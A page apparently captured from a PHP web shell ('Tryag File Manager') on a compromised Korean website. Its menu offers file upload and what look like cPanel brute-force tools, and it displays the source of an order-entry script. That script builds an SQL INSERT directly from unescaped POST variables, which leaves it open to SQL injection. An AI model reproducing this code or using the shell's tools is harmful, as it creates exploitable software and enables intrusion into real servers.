Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
egg.eemo.co.kr
/
public_html
/
super5
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/egg.eemo.co.kr/public_html/super5/lot_order_write_do.php
<? session_cache_limiter('no-cache, must-revalidate'); session_start(); header("Pragma: no-cache"); header("Cache-Control: no-cache,must-revalidate"); header("Content-Type: text/html; charset=utf-8"); foreach($_POST as $key => $value) { ${$key}=trim($value); } if(!$_SESSION[mem_id]) { echo "<script>alert('권한이 없습니다.');history.back();</script>"; exit; } include_once("dbconn.php"); include_once("lib.php"); ini_set('max_execution_time',86400); $query="insert into lot_order set product_name='$product_name', model_name='$model_name', made_nation='$made_nation', made_company='$made_company', made_company_addr='$made_company_addr', oem_company='$oem_company', oem_addr='$oem_addr', cs_tel='$cs_tel', made_su='$made_su', balju_date='$balju_date', chulgo_date='$chulgo_date', bigo='$bigo', lot_code='$lot_code', regdate=now() "; mysql_query($query) or die(mysql_error()); echo "<meta http-equiv='refresh' content='0;url=lot_order.php'>"; ?>